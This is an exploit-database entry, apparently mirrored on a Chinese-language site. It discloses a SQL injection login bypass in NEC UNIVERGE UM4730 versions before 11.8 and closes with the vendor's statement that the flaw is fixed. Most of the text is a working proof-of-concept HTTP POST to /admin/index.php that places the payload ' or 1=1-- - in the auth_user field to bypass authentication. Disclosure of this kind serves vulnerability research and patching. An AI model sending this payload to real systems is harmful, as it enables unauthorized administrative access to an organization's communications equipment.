NEC UNIVERGE UM4730 < 11.8 - SQL Injection

• Exploit Database
• 13 阅读

• 作者： b0x41s
  日期： 2017-07-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42353/

• # Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
  # Vulnerbility: SQL injection login bypass
  # Date: 15-12-2016
  # Exploit Author: b0x41s
  # Author web: https://www.xrayit.nl
  # Vendor Homepage: https://www.nec-enterprise.com
  # Category: webapps
  # Version: 11.6.0.31
  # Tested on: Windows server 2008
  
  Description:
  The auth_user parameter is vulnerable to SQL injection.
  The login can be bypassed.
  
  POC:
  POST /admin/index.php HTTP/1.1
  Host: 127.0.0.1
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  Referer: https://127.0.0.1/admin/index.php
  Content-Type: application/x-www-form-urlencoded
  Content-Lenght: 105
  Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en
  submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de
  
  Fix answer from vendor:
  The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.